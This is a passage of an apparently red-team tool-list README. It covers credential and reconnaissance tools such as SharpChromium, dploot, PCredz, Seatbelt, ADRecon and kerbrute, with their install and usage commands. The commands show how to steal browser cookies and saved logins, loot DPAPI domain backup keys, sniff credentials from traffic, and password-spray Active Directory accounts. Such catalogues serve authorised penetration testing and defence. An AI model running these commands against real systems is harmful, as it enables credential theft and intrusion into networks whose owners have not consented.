0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">SharpChromium is a .NET 4.0+ CLR project to retrieve data from Google Chrome, Microsoft Edge, and Microsoft Edge Beta. Currently, it can extract:</p> <ul dir="auto"> <li>Cookies (in JSON format)</li> <li>History (with associated cookies for each history item)</li> <li>Saved Logins</li> </ul> <p dir="auto">This rewrite has several advantages to previous implementations, which include:</p> <ul dir="auto"> <li>No Type compilation or reflection required</li> <li>Cookies are displayed in JSON format, for easy importing into Cookie Editor.</li> <li>No downloading SQLite assemblies from remote resources.</li> <li>Supports major Chromium browsers (but extendable to others)</li> </ul> <p dir="auto"><strong>Install:</strong></p> <p dir="auto">Using <a href="https://visualstudio.microsoft.com/downloads/" rel="nofollow">Visual Studio Community Edition</a>.</p> <p dir="auto">Open up the project .sln, choose "release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Retrieve cookies associated with Google Docs and Github .\SharpChromium.exe cookies docs.google.com github.com # Retrieve history items and their associated cookies. .\SharpChromium.exe history # Retrieve saved logins (Note: Only displays those with non-empty passwords): .\SharpChromium.exe logins"><pre><span class="pl-c"><span class="pl-c">#</span> Retrieve cookies associated with Google Docs and Github</span> .<span class="pl-cce">\S</span>harpChromium.exe cookies docs.google.com github.com <span class="pl-c"><span class="pl-c">#</span> Retrieve history items and their associated cookies.</span> .<span class="pl-cce">\S</span>harpChromium.exe <span class="pl-c1">history</span> <span class="pl-c"><span class="pl-c">#</span> Retrieve saved logins (Note: Only displays those with non-empty passwords):</span> .<span class="pl-cce">\S</span>harpChromium.exe logins</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png"><img src="https://user-images.githubusercontent.com/100603074/220959335-6e7a8275-bad9-4c3f-883f-2d7ab6749b75.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://github.com/djhohnstein/SharpChromium">https://github.com/djhohnstein/SharpChromium</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/zblurx/dploot">dploot</a></h3><a id="user-content-dploot" class="anchor" aria-label="Permalink: 🔙dploot" href="#dploot"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">DPAPI (Data Protection Application Programming Interface) provides a set of APIs to encrypt and decrypt data where a user password is typically used to set the 'master key' (in a user scenario). So to leverage DPAPI to gain access to certain data (Chrome Cookies/Login Data, the Windows Credential Manager/Vault etc) we just need access to a password.</p> <p dir="auto">dploot is Python rewrite of SharpDPAPI written un C# by Harmj0y, which is itself a port of DPAPI from Mimikatz by gentilkiwi. It implements all the DPAPI logic of these tools, but this time it is usable with a python interpreter and from a Linux environment.</p> <p dir="auto"><a href="https://posts.specterops.io/operational-guidance-for-offensive-user-dpapi-abuse-1fb7fac8b107" rel="nofollow">Blog - Operational Guidance for Offensive User DPAPI Abuse</a></p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install dploot"><pre>pip install dploot</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/zblurx/dploot.git cd dploot make"><pre>git clone https://github.com/zblurx/dploot.git <span class="pl-c1">cd</span> dploot make</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Loot decrypted machine private key files as a Windows local administrator dploot machinecertificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -quiet # Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user) dploot backupkey -d waza.local -u Administrator -p 'Password!123' 192.168.56.112 -quiet # Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints dploot certificates -d waza.local -u Administrator -p 'Password!123' 192.168.56.14 -pvk key.pvk -quiet "><pre><span class="pl-c"><span class="pl-c">#</span> Loot decrypted machine private key files as a Windows local administrator </span> dploot machinecertificates -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.14 -quiet <span class="pl-c"><span class="pl-c">#</span> Loot the DPAPI backup key as a Windows Domain Administrator (Will allow attacker to loot and decrypt any DPAPI protected password realted to a domain user)</span> dploot backupkey -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.112 -quiet <span class="pl-c"><span class="pl-c">#</span> Leverage the DPAPI backup key `key.pvk` to loot any user secrets stored on Windows domain joined endpoints</span> dploot certificates -d waza.local -u Administrator -p <span class="pl-s"><span class="pl-pds">'</span>Password!123<span class="pl-pds">'</span></span> 192.168.56.14 -pvk key.pvk -quiet </pre></div> <div class="markdown-heading" dir="auto"><h1 tabindex="-1" class="heading-element" dir="auto">Discovery</h1><a id="user-content-discovery" class="anchor" aria-label="Permalink: Discovery" href="#discovery"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/lgandx/PCredz">PCredz</a></h3><a id="user-content-pcredz" class="anchor" aria-label="Permalink: 🔙PCredz" href="#pcredz"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">This tool extracts Credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, etc from a pcap file or from a live interface.</p> <p dir="auto"><strong>Install:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/lgandx/PCredz"><pre>git clone https://github.com/lgandx/PCredz</pre></div> <p dir="auto"><strong>Usage:</strong> (PCAP File Folder)</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./Pcredz -d /tmp/pcap-directory-to-parse/"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">Pcredz</span> <span class="pl-c1">-</span><span class="pl-s1">d</span> <span class="pl-c1">/</span><span class="pl-s1">tmp</span><span class="pl-c1">/</span><span class="pl-s1">pcap</span><span class="pl-c1">-</span><span class="pl-s1">directory</span><span class="pl-c1">-</span><span class="pl-s1">to</span><span class="pl-c1">-</span><span class="pl-s1">parse</span><span class="pl-c1">/</span></pre></div> <p dir="auto"><strong>Usage:</strong> (Live Capture)</p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="python3 ./Pcredz -i eth0 -v"><pre><span class="pl-s1">python3</span> .<span class="pl-c1">/</span><span class="pl-c1">Pcredz</span> <span class="pl-c1">-</span><span class="pl-s1">i</span> <span class="pl-s1">eth0</span> <span class="pl-c1">-</span><span class="pl-s1">v</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png"><img src="https://user-images.githubusercontent.com/100603074/191007004-a0fd01f3-e01f-4bdb-b89e-887c85a7be91.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/vletoux/pingcastle">PingCastle</a></h3><a id="user-content-pingcastle" class="anchor" aria-label="Permalink: 🔙PingCastle" href="#pingcastle"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Ping Castle is a tool designed to assess quickly the Active Directory security level with a methodology based on risk assessment and a maturity framework. It does not aim at a perfect evaluation but rather as an efficiency compromise.</p> <p dir="auto"><strong>Install:</strong> (Download)</p> <div class="snippet-clipboard-content notranslate position-relative overflow-auto" data-snippet-clipboard-copy-content="https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip"><pre class="notranslate"><code>https://github.com/vletoux/pingcastle/releases/download/2.11.0.1/PingCastle_2.11.0.1.zip </code></pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-python notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="./PingCastle.exe"><pre>.<span class="pl-c1">/</span><span class="pl-v">PingCastle</span>.<span class="pl-c1">exe</span></pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png"><img src="https://user-images.githubusercontent.com/100603074/191008405-39bab2dc-54ce-43d1-aed7-53956776a9ef.png" alt="image" style="max-width: 100%;"></a></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/GhostPack/Seatbelt">Seatbelt</a></h3><a id="user-content-seatbelt" class="anchor" aria-label="Permalink: 🔙Seatbelt" href="#seatbelt"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Seatbelt is a useful tool for gathering detailed information about the security posture of a target Windows machine in order to identify potential vulnerabilities and attack vectors.</p> <p dir="auto">It is designed to be run on a compromised victim machine to gather information about the current security configuration, including information about installed software, services, group policies, and other security-related settings</p> <p dir="auto"><strong>Install: (Compile)</strong></p> <p dir="auto">Seatbelt has been built against .NET 3.5 and 4.0 with C# 8.0 features and is compatible with <a href="https://visualstudio.microsoft.com/downloads/" rel="nofollow">Visual Studio Community Edition</a>.</p> <p dir="auto">Open up the project .sln, choose "release", and build.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Run all checks and output to output.txt Seatbelt.exe -group=all -full > output.txt # Return 4624 logon events for the last 30 days Seatbelt.exe "LogonEvents 30" # Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.* Seatbelt.exe "reg \"HKLM\SOFTWARE\Microsoft\Windows Defender\" 3 .*defini.* true" # Run remote-focused checks against a remote system Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE\sam -password="yum \"po-ta-toes\"""><pre><span class="pl-c"><span class="pl-c">#</span> Run all checks and output to output.txt</span> Seatbelt.exe -group=all -full <span class="pl-k">></span> output.txt <span class="pl-c"><span class="pl-c">#</span> Return 4624 logon events for the last 30 days</span> Seatbelt.exe <span class="pl-s"><span class="pl-pds">"</span>LogonEvents 30<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Query the registry three levels deep, returning only keys/valueNames/values that match the regex .*defini.*</span> Seatbelt.exe <span class="pl-s"><span class="pl-pds">"</span>reg <span class="pl-cce">\"</span>HKLM\SOFTWARE\Microsoft\Windows Defender<span class="pl-cce">\"</span> 3 .*defini.* true<span class="pl-pds">"</span></span> <span class="pl-c"><span class="pl-c">#</span> Run remote-focused checks against a remote system</span> Seatbelt.exe -group=remote -computername=192.168.230.209 -username=THESHIRE<span class="pl-cce">\s</span>am -password=<span class="pl-s"><span class="pl-pds">"</span>yum <span class="pl-cce">\"</span>po-ta-toes<span class="pl-cce">\"</span><span class="pl-pds">"</span></span></pre></div> <p dir="auto">Full command groups and parameters can be found <a href="https://github.com/GhostPack/Seatbelt#command-groups">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png"><img src="https://user-images.githubusercontent.com/100603074/210137456-14eb3329-f29d-4ce1-a595-3466bd5a962f.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://exord66.github.io/csharp-in-memory-assemblies" rel="nofollow">https://exord66.github.io/csharp-in-memory-assemblies</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/sense-of-security/adrecon">ADRecon</a></h3><a id="user-content-adrecon" class="anchor" aria-label="Permalink: 🔙ADRecon" href="#adrecon"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">Great tool for gathering information about a victim's Microsoft Active Directory (AD) environment, with support for Excel outputs.</p> <p dir="auto">It can be run from any workstation that is connected to the environment, even hosts that are not domain members.</p> <p dir="auto"><a href="https://speakerdeck.com/prashant3535/adrecon-bh-usa-2018-arsenal-and-def-con-26-demo-labs-presentation" rel="nofollow">BlackHat USA 2018 SlideDeck</a></p> <p dir="auto"><strong>Prerequisites</strong></p> <ul dir="auto"> <li>.NET Framework 3.0 or later (Windows 7 includes 3.0)</li> <li>PowerShell 2.0 or later (Windows 7 includes 2.0)</li> </ul> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/sense-of-security/ADRecon.git"><pre>git clone https://github.com/sense-of-security/ADRecon.git</pre></div> <p dir="auto"><strong>Install: (Download)</strong></p> <p dir="auto">You can download a zip archive of the <a href="https://github.com/sense-of-security/ADRecon/archive/master.zip">latest release</a>.</p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# To run ADRecon on a domain member host. PS C:\> .\ADRecon.ps1 # To run ADRecon on a domain member host as a different user. PS C:\>.\ADRecon.ps1 -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon on a non-member host using LDAP. PS C:\>.\ADRecon.ps1 -Protocol LDAP -DomainController <IP or FQDN> -Credential <domain\username> # To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter) PS C:\>.\ADRecon.ps1 -Protocol ADWS -DomainController <IP or FQDN> -Credential <domain\username> -Collect Domain, DomainControllers"><pre><span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a domain member host.</span> PS C:<span class="pl-cce">\></span> .<span class="pl-cce">\A</span>DRecon.ps1 <span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a domain member host as a different user.</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> To run ADRecon on a non-member host using LDAP.</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -Protocol LDAP -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> <span class="pl-c"><span class="pl-c">#</span> To run ADRecon with specific modules on a non-member host with RSAT. (Default OutputType is STDOUT with -Collect parameter)</span> PS C:<span class="pl-cce">\></span>.<span class="pl-cce">\A</span>DRecon.ps1 -Protocol ADWS -DomainController <span class="pl-k"><</span>IP or FQDN<span class="pl-k">></span> -Credential <span class="pl-k"><</span>domain<span class="pl-cce">\u</span>sername<span class="pl-k">></span> -Collect Domain, DomainControllers</pre></div> <p dir="auto">Full usage and parameter information can be found <a href="https://github.com/sense-of-security/adrecon#usage">here</a>.</p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png"><img src="https://user-images.githubusercontent.com/100603074/210137064-2a0247b3-5d28-409a-904b-0fd9db87ef56.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://vk9-sec.com/domain-enumeration-powerview-adrecon/" rel="nofollow">https://vk9-sec.com/domain-enumeration-powerview-adrecon/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/dirkjanm/adidnsdump">adidnsdump</a></h3><a id="user-content-adidnsdump" class="anchor" aria-label="Permalink: 🔙adidnsdump" href="#adidnsdump"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">By default any user in Active Directory can enumerate all DNS records in the Domain or Forest DNS zones, similar to a zone transfer.</p> <p dir="auto">This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks.</p> <p dir="auto"><strong>Install: (Pip)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump"><pre>pip install git+https://github.com/dirkjanm/adidnsdump#egg=adidnsdump</pre></div> <p dir="auto"><strong>Install: (Git)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/dirkjanm/adidnsdump cd adidnsdump pip install ."><pre>git clone https://github.com/dirkjanm/adidnsdump <span class="pl-c1">cd</span> adidnsdump pip install <span class="pl-c1">.</span></pre></div> <p dir="auto"><strong>Note:</strong> <em>The tool requires <code>impacket</code> and <code>dnspython</code> to function. While the tool works with both Python 2 and 3, Python 3 support requires you to install <a href="https://github.com/CoreSecurity/impacket">impacket from GitHub</a>.</em></p> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# Display the zones in the domain where you are currently in adidnsdump -u icorp\\testuser --print-zones icorp-dc.internal.corp # Display all zones in the domain adidnsdump -u icorp\\testuser icorp-dc.internal.corp # Resolve all unknown records (-r) adidnsdump -u icorp\\testuser icorp-dc.internal.corp -r"><pre><span class="pl-c"><span class="pl-c">#</span> Display the zones in the domain where you are currently in</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser --print-zones icorp-dc.internal.corp <span class="pl-c"><span class="pl-c">#</span> Display all zones in the domain</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser icorp-dc.internal.corp <span class="pl-c"><span class="pl-c">#</span> Resolve all unknown records (-r)</span> adidnsdump -u icorp<span class="pl-cce">\\</span>testuser icorp-dc.internal.corp -r</pre></div> <p dir="auto"><a href="https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/" rel="nofollow">Blog - Getting in the Zone: dumping Active Directory DNS using adidnsdump</a></p> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg"><img src="https://user-images.githubusercontent.com/100603074/210986363-724e6611-12e9-4a0d-abfa-c44665010b97.jpg" alt="adidnsdump" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/" rel="nofollow">https://dirkjanm.io/getting-in-the-zone-dumping-active-directory-dns-with-adidnsdump/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/ropnop/kerbrute">kerbrute</a></h3><a id="user-content-kerbrute" class="anchor" aria-label="Permalink: 🔙kerbrute" href="#kerbrute"><svg class="octicon octicon-link" viewBox="0 0 16 16" version="1.1" width="16" height="16" aria-hidden="true"><path d="m7.775 3.275 1.25-1.25a3.5 3.5 0 1 1 4.95 4.95l-2.5 2.5a3.5 3.5 0 0 1-4.95 0 .751.751 0 0 1 .018-1.042.751.751 0 0 1 1.042-.018 1.998 1.998 0 0 0 2.83 0l2.5-2.5a2.002 2.002 0 0 0-2.83-2.83l-1.25 1.25a.751.751 0 0 1-1.042-.018.751.751 0 0 1-.018-1.042Zm-4.69 9.64a1.998 1.998 0 0 0 2.83 0l1.25-1.25a.751.751 0 0 1 1.042.018.751.751 0 0 1 .018 1.042l-1.25 1.25a3.5 3.5 0 1 1-4.95-4.95l2.5-2.5a3.5 3.5 0 0 1 4.95 0 .751.751 0 0 1-.018 1.042.751.751 0 0 1-1.042.018 1.998 1.998 0 0 0-2.83 0l-2.5 2.5a1.998 1.998 0 0 0 0 2.83Z"></path></svg></a></div> <p dir="auto">A tool to quickly bruteforce and enumerate valid Active Directory accounts through Kerberos Pre-Authentication.</p> <p dir="auto"><strong>Install: (Go)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="go get github.com/ropnop/kerbrute"><pre>go get github.com/ropnop/kerbrute</pre></div> <p dir="auto"><strong>Install: (Make)</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="git clone https://github.com/ropnop/kerbrute cd kerbrute make all"><pre>git clone https://github.com/ropnop/kerbrute <span class="pl-c1">cd</span> kerbrute make all</pre></div> <p dir="auto"><strong>Usage:</strong></p> <div class="highlight highlight-source-shell notranslate position-relative overflow-auto" dir="auto" data-snippet-clipboard-copy-content="# User Enumeration ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt # Password Spray ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 # Brute User ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman # Brute Force ./kerbrute -d lab.ropnop.com bruteforce -"><pre><span class="pl-c"><span class="pl-c">#</span> User Enumeration</span> ./kerbrute_linux_amd64 userenum -d lab.ropnop.com usernames.txt <span class="pl-c"><span class="pl-c">#</span> Password Spray</span> ./kerbrute_linux_amd64 passwordspray -d lab.ropnop.com domain_users.txt Password123 <span class="pl-c"><span class="pl-c">#</span> Brute User</span> ./kerbrute_linux_amd64 bruteuser -d lab.ropnop.com passwords.lst thoffman <span class="pl-c"><span class="pl-c">#</span> Brute Force</span> ./kerbrute -d lab.ropnop.com bruteforce -</pre></div> <p dir="auto"><a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png"><img src="https://user-images.githubusercontent.com/100603074/212205129-e5906b50-78c5-4507-8b1e-74a6686bed14.png" alt="image" style="max-width: 100%;"></a></p> <p dir="auto"><em>Image used from <a href="https://matthewomccorkle.github.io/day_032_kerbrute/" rel="nofollow">https://matthewomccorkle.github.io/day_032_kerbrute/</a></em></p> <div class="markdown-heading" dir="auto"><h3 tabindex="-1" class="heading-element" dir="auto"><a href="#tool-list">🔙</a><a href="https://github.com/SpiderLabs/scavenger">scavenger</a></h3><a id="user-content-scavenger" class="anchor" aria-label="Permalink: 🔙scavenger" href="#scavenger"><svg 